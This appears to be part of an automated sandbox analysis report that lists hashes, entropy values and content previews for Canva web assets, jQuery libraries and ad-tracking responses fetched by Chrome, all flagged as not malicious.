                                                                                                                                                                                                                                                                    Size (bytes):3032
                                                                                                                                                                                                                                                                    Entropy (8bit):5.390908526237203
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:qsHk/EJST0D9cBg09lDjib8GmVH2Y3URlhHYVQvBiVqGtrOXf:qsE/BTggsb8GY3UTF4QpdGA
                                                                                                                                                                                                                                                                    MD5:A7996780B208157442E889D7272012F6
                                                                                                                                                                                                                                                                    SHA1:7A07C5E85B6943CEFE398FDD5DE696D25CA16F75
                                                                                                                                                                                                                                                                    SHA-256:4CB016AE48EED1CCD79CFC8C379B3BCA52C56B6E68FDDD1D6B2467BCC0986E48
                                                                                                                                                                                                                                                                    SHA-512:55D95B04E627CF56ED7BBF195E588D992EFBC7A026A1B49EC2569A6B8B1A0EBAFBAB1215B35C9FEA97DCCD001E8CDA543538B9AC3F9A76A2570EB3E421AF73B3
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/314d0852e94e7e23.ltr.css
                                                                                                                                                                                                                                                                    Preview:html{--safe-area-inset-top:0px;--safe-area-inset-bottom:0px;--safe-area-inset-left:0px;--safe-area-inset-right:0px}@supports (height:env(safe-area-inset-top)){html{--safe-area-inset-top:env(safe-area-inset-top);--safe-area-inset-bottom:env(safe-area-inset-bottom);--safe-area-inset-left:env(safe-area-inset-left);--safe-area-inset-right:env(safe-area-inset-right)}}.r5wnFA{flex:1}._4Z3UgA{min-height:32px}.GdC69Q{margin:-4px}.jQLKLw{bottom:0;height:100%;left:0;position:fixed;transform:translateY(calc(var(--8gqqmQ, 0px) - var(--4-IqNQ, 0px)));transition:transform .2s ease;width:100%}@supports (top:100svh){.jQLKLw{height:100vh}}.jQLKLw:not(.G0knkQ){pointer-events:none}.G0knkQ{background-color:rgba(13,18,22,0);touch-action:none}.DtAzyA .G0knkQ{transition:background-color .2s ease-in-out}.N987xw .G0knkQ{background-color:var(--olfr3Q)}.oOFzGQ{bottom:var(--safe-area-inset-bottom);bottom:max(0px,calc(var(--safe-area-inset-bottom) - var(--4-IqNQ, 0px)));left:0;right:0;top:calc(var(--safe-area-inse
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65311)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):418962
                                                                                                                                                                                                                                                                    Entropy (8bit):5.4140291911106795
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12288:JkmwnouZA7UMJK3imf9Wdn5ZFyTvcGrYzqZh+TscGLruDmg2/hG1y:JsnouZArk3FVWdn5ZFyTvcGrYzqZh+TU
                                                                                                                                                                                                                                                                    MD5:74774747B99F5DEC64505A1E8A9AF3AF
                                                                                                                                                                                                                                                                    SHA1:AAB49AFE2294CDA7106E62A87275A5341A4836DD
                                                                                                                                                                                                                                                                    SHA-256:9A1189DDECC87CEFAF1EE87A69C19392FB9E125219381C374036534F1AFB2A61
                                                                                                                                                                                                                                                                    SHA-512:8D9BDC31D0DDF0668D4EFB0EDDA11ABFE73D22F91CF87385FEBC77F5D110E5A03B46288D7FE29A0A3661832AA69D382E8EB08A5E886331FAE51FB49D8CAD7630
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/ad9231ed6706fadf.vendor.js
                                                                                                                                                                                                                                                                    Preview:/*! For license information please see ad9231ed6706fadf.vendor.js.LICENSE.txt */.(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{907554:(e,t,n)=>{!function(){var e="undefined"!=typeof window?window:n.g,r={};for(var i in function(e,t,n){var r;function a(e){var t=0;return function(){return t<e.length?{done:!1,value:e[t++]}:{done:!0}}}var o="function"==typeof Object.defineProperties?Object.defineProperty:function(e,t,n){return e==Array.prototype||e==Object.prototype||(e[t]=n.value),e};var s=function(n){n=["object"==typeof globalThis&&globalThis,n,"object"==typeof e&&e,"object"==typeof self&&self,"object"==typeof t&&t];for(var r=0;r<n.length;++r){var i=n[r];if(i&&i.Math==Math)return i}throw Error("Cannot find global object")}(this);function u(e,t){if(t)e:{var n=s;e=e.split(".");for(var r=0;r<e.length-1;r++){var i=e[r];if(!(i in n))break e;n=n[i]}(t=t(r=n[e=e[e.length-1]]))!=r&&null!=t&&o(n,e,{configurable:!0,writable:!0,value:t})}}function c(e){return(e={next:e}
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):65
                                                                                                                                                                                                                                                                    Entropy (8bit):4.314128390879881
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:2erWeKBRk35KLWAzRERxzfRX/H4Y3:29M3tRdfZN
                                                                                                                                                                                                                                                                    MD5:83A02FE42F8C2198E7C608AFF363AA49
                                                                                                                                                                                                                                                                    SHA1:7B20AE1014450492CC708E3C9DC7522B05C2EFFD
                                                                                                                                                                                                                                                                    SHA-256:E64954DC34E12C7190CC2338A54B07644FF0F102AA71CC7209BCBB49C3009F7C
                                                                                                                                                                                                                                                                    SHA-512:CD381A8C725C892E9A68D713254A31EA9ED25A39B212A5DC52D4BA2655F38AFDDB32519F03360F32A59D8E7701AF6C2AD0030A6AA760C3DE87C75063F5B65F54
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:event: message.data: {"response":{"status_code":200,"body":""}}..
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2099)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):19427
                                                                                                                                                                                                                                                                    Entropy (8bit):5.434887920035635
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:rmDEIbLcM66D7Z8n6+cjZKRg0j303O8PyP4xgkVKd3XU+i0K6GP5hG4wNMjmPHTp:rmDEIbLcPGqRgw303O8PyP4xvKd3XU+N
                                                                                                                                                                                                                                                                    MD5:074762FFEBF691A335250ED795F0BD76
                                                                                                                                                                                                                                                                    SHA1:5B8293FD60D2201481ADB24424E9FDB5B61579E9
                                                                                                                                                                                                                                                                    SHA-256:557A6988F6C7641A1605DF33C1195DC72C3A04CB5913424C992339221488279D
                                                                                                                                                                                                                                                                    SHA-512:C4BB0A29214B65796333A4C432C85B13F8DA6F6878B7325E74BD45411E194D34E29FA7A6F00BC12D69AE4C88E57B070BF7BFE8C2864CD43D098410CCC6196B49
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://chunk-composing.canva.com/chunk-batch/5756a030498f80f0.js+b3bc71e281d55f78.js
                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:5756a030498f80f0.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6305],{../***/ 790697:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(353279);__web_req__(323028);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var XMc=function(a,b){b&&__webpack_require__.me(890961).then(c=>{const d=new VMc(a.xp,b,c);WMc(()=>a.xp,e=>d.Qr(e));d.start();return d})},YMc=async function(a){a.Hl=await __webpack_require__.me(890961)},$Mc=async function(a,b,c){await ZMc(a,b,c);a.i8(b)},ZMc=async function(a,b,c){if(null!=c&&c===a.bootstrap.userId)try{"function"===typeof a.Bd&&(a.Bd=await a.Bd());const d=await a.Bd.Ota(new aNc({userId:c}));d.Vha||(b.BG=d.hh.BG)}catch(d){a.G.info(d instanceof Error?d:`Unknown error ${d}`,"Could not fetch privacy preferences")}},.bNc=__c.M(()=>[1,2,3,4,5,6]),cN
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (62330), with no line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):79912
                                                                                                                                                                                                                                                                    Entropy (8bit):5.8724809466699295
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:F/x2sTIjkcFMQ+MpI/niY5KSQYLoFMoUEdS/MvpB0CmLwFRTT2DOECQ44oYkX0CN:pIoIQciFd/zXo6oUEdS/MvpBlmLkRTT/
                                                                                                                                                                                                                                                                    MD5:451F69D7C6A992FF4C166BD5AD4C1540
                                                                                                                                                                                                                                                                    SHA1:7C7662D73F1BD7B9879B32B39CC83B1E34523D9A
                                                                                                                                                                                                                                                                    SHA-256:9B1AA2D2A95C9EFD9AA9E9840E0867C9A575D1131A6EC0D2E873EA2263C71B75
                                                                                                                                                                                                                                                                    SHA-512:A69A4608B460DE94FF835BE986EB2E2448424515CFB807F686AA47FDFD7C82B0A26F2403A5ED991094AEE27A905FAC258D5548BC2BB706AB6C076870155FE318
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[4318],{700354:function(n,t){!function(n){var t=Math;function r(n,t){for(var r,e,o,u="",c=t%26,i=0;i<n.length;i++)u+=(e=c,65<=(o=(r=n.charAt(i)).charCodeAt())&&o<=90?String.fromCharCode((o-65+e)%26+65):97<=o&&o<=122?String.fromCharCode((o-97+e)%26+97):32===o?String.fromCharCode(o+1):33===o?String.fromCharCode(o-1):r);return u}function e(n){var t,r={},e=n.split(""),o=e[0],u=[o],c=256,i=e[0],a=256;for(n=1;n<e.length;n++)t=(t=e[n].charCodeAt(0))<c?e[n]:r[t]||i+o,u.push(t),o=t.charAt(0),r[a]=i+o,a++,i=t;return u.join("")}var o=e("gbFgevat?pnyyre,nethzragf.bclSebzPunaary,trg...yQngn?.g.rdh.plErfcbafr..Vzn.....Y.r.fu,vfCb.gVaC........xr,.nfherGrkg,.nqe.vpP.i.b,sv...,f.b...s.g?.gC.c.gl.g....l..h.Lr..Ub.f.Z.hg.....Gv....m.rBss................rp.q..Z..F..........t,.WFBA.bYb........r................,i...?.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1439)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):124787
                                                                                                                                                                                                                                                                    Entropy (8bit):5.743659114188181
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:nLQ5b40k5I4jQaLuiKm60ax//VAyg4pRhE884f17KNXMF+0JeagbqeTSEkeqUA:LK40ajjLuvhi8f17KNcgXYeTSEkeqUA
                                                                                                                                                                                                                                                                    MD5:3BD2EA7D8BF4C20B72F4CEE9429CA81D
                                                                                                                                                                                                                                                                    SHA1:6FECC4519FDC2F776E885A14CB3F9E12ABAC4A5C
                                                                                                                                                                                                                                                                    SHA-256:A35151B1E0CE3DCD108697BDD4927AE10716243413DABCF6BE22781D45B4D447
                                                                                                                                                                                                                                                                    SHA-512:1EE70F30BCAB4A06DC4EAF39A4693C92DD047D42DA984BC1FE1E695060141C6B42FAEC35E98ED67B10B108C367D7C738B28F5C32A4D2AC8A09E41C426FFCBAC8
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6037],{../***/ 214458:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(694173);__web_req__(209121);__web_req__(201099);__web_req__(517447);__web_req__(309729);__web_req__(800513);__web_req__(552859);__web_req__(79194);__web_req__(624833);__web_req__(913728);__web_req__(68864);__web_req__(629056);__web_req__(753339);__web_req__(417775);__web_req__(558104);__web_req__(139504);__web_req__(515388);__web_req__(775089);__web_req__(353279);__web_req__(526023);__web_req__(588845);__web_req__(228043);__web_req__(178040);__web_req__(277425);__web_req__(713410);__web_req__(232149);__web_req__(823125);__web_req__(772112);__web_req__(224868);__web_req__(145431);__web_req__(121446);__web_req__(402398);__web_req__(550863);__web_req__(786266);__web_req__(822778);__web_req__(46127);__web_req__(388999);__web_req__(290
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (32065)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):85578
                                                                                                                                                                                                                                                                    Entropy (8bit):5.366055229017455
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                                                                                                                                                                    MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                                                                                                                                                    SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                                                                                                                                                    SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                                                                                                                                                    SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                                                                                                                                                                                                    Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2884)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):5461
                                                                                                                                                                                                                                                                    Entropy (8bit):5.7222205790149765
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:3uAgW2EPkYLo8EJIRqSrseux9DRH3+TwuxDEfODU0zIelkC0/2L8K7FoGf3Feqgu:3uApOB8JxrrQ9UpxwfEU0EKqq
                                                                                                                                                                                                                                                                    MD5:D258A53D8E3B3337F4AD038BEB8DF26A
                                                                                                                                                                                                                                                                    SHA1:6D0877F1C4E65E998C2274F0968D37D10B9E02AB
                                                                                                                                                                                                                                                                    SHA-256:DD107EF9590C0D60D180F323DECB90CADF375F04975A9C7C5D51A0544A989582
                                                                                                                                                                                                                                                                    SHA-512:ADD01E994258D47E928599C87BA9AD2D57B81F22919AE7D1207B843D27C0453005EF9C37694F9AC13FC35AFF3B41BD2D449B4FF9686D6039EFEC40EECC8CF470
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/107bbcd1676c194c.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[4464],{../***/ 694173:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(9164);__web_req__(277425);__web_req__(201099);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var ca=__c.ca;var T=__c.T;var Q=__c.Q;var L=__c.L;var KQa,LQa,hB,PQa,TQa,UQa,XQa;__c.bB=function(a,b){const c=[],d=[];let e=0;for(const f of a)b(f,e)?c.push(f):d.push(f),e++;return[c,d]};__c.cB=function(a){return String(a).padStart(2,"0")};__c.dB=function(a,b,c,d,e){d=new Date(Date.UTC(a,b,null!=c?c:1,d||0,e||0));d.setUTCFullYear(a,b,null!==c&&void 0!==c?c:1);return d};__c.eB=function(a){return a instanceof Date||"number"===typeof a?new Date(a):"string"===typeof a?KQa(a):LQa(a)};.KQa=function(a){var b=a.split("T");a=b[0].split("-").map(Number);b=(b[1]||"").split(":",2).map(c=>Number(c.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1410)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2900
                                                                                                                                                                                                                                                                    Entropy (8bit):5.518924777475345
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:ja8b343QwcqScTCa7343QwcqScTUuLmwcqScHgQLRmaKcbFCKWrCdR5:+8bIKSt7IKS5LYSHgi8p2FC5g5
                                                                                                                                                                                                                                                                    MD5:2F18ED16DD3EB4AD39ADB5BB47587EF7
                                                                                                                                                                                                                                                                    SHA1:1B3C00C43CD35DB6629871A72FC428F5B9BF81BB
                                                                                                                                                                                                                                                                    SHA-256:F0DB12FAF70B3EE0D0A0CCC54320488B8858BB66A2ACBD8D06C5500EF109DE92
                                                                                                                                                                                                                                                                    SHA-512:E368ACC4681FE04A56989EA3E4532EC7208A3D8EEA3D31711BAB5DEDA25D3105F996977D7BAD49F88C4AFEC243E20D6D492BF10E49FE747623E057CEFC7F6AF2
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2037306899;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=912800932;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor?"],"options":{"attribution_reporting":true}}..event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=2037306899;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (32065)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):85578
                                                                                                                                                                                                                                                                    Entropy (8bit):5.366055229017455
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                                                                                                                                                                    MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                                                                                                                                                    SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                                                                                                                                                    SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                                                                                                                                                    SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (32030)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):86709
                                                                                                                                                                                                                                                                    Entropy (8bit):5.367391365596119
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
                                                                                                                                                                                                                                                                    MD5:E071ABDA8FE61194711CFC2AB99FE104
                                                                                                                                                                                                                                                                    SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                                                                                                                                                                                                                                                    SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                                                                                                                                                                                                                                                    SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://code.jquery.com/jquery-3.1.1.min.js
                                                                                                                                                                                                                                                                    Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):368
                                                                                                                                                                                                                                                                    Entropy (8bit):4.546742488437108
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6:tI9mc4sl3WfR9F37qCdzU4jQT1m9etUNq1RQv7HD6DVJOp0zjyA0mI4YLJ5TDh:t41WffF37vdz3QT49etN127gtvb0mE/x
                                                                                                                                                                                                                                                                    MD5:0483F2B648DCC986D01385062052AE1C
                                                                                                                                                                                                                                                                    SHA1:61BD815F1497863265A76D92623042835E5E7FE2
                                                                                                                                                                                                                                                                    SHA-256:09A743EE0C32CA57C9BE64B13B29C396310D1DD309CB4D7D3BE722E47DB95F27
                                                                                                                                                                                                                                                                    SHA-512:359F9BCC2441DC48FFBE69353BB7D4143A2037B0263BD5F0CFB06B14D5F15D9A6E574930E88A84081C61698BF3E2F5333BF9081865183AA7F9202AAC078C10FF
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#DD2E44" d="M35.885 11.833c0-5.45-4.418-9.868-9.867-9.868-3.308 0-6.227 1.633-8.018 4.129-1.791-2.496-4.71-4.129-8.017-4.129-5.45 0-9.868 4.417-9.868 9.868 0 .772.098 1.52.266 2.241C1.751 22.587 11.216 31.568 18 34.034c6.783-2.466 16.249-11.447 17.617-19.959.17-.721.268-1.469.268-2.242z"/></svg>
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (35828)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):796858
                                                                                                                                                                                                                                                                    Entropy (8bit):5.608470933371809
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24576:2knDbcX34oynJY/OQJwSxnV7wuTKwh/+et2RbsF4IpHZk34D+yMoiTaEIUR5eb18:2knDbcX34oynJY/OQJwSxnV7wuT3p+eA
                                                                                                                                                                                                                                                                    MD5:13358100E6EE465EA5E11AA3ABCB07C8
                                                                                                                                                                                                                                                                    SHA1:E0F7323D9F96EB31F6C33574725B7B0D1AC30539
                                                                                                                                                                                                                                                                    SHA-256:0BC9958E8BE3D13CAA9B206D883136D6B57404A27E134AF255848596E6211D21
                                                                                                                                                                                                                                                                    SHA-512:B8ABB6E38A6BBC6447B2E1AD7B766CB7B4DB256217FD0E06A0A9E241BBBEE645E31BC0EE2091DBF465D0EDB9EC796C3D4BE75470148266EADF159063CEB086BC
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
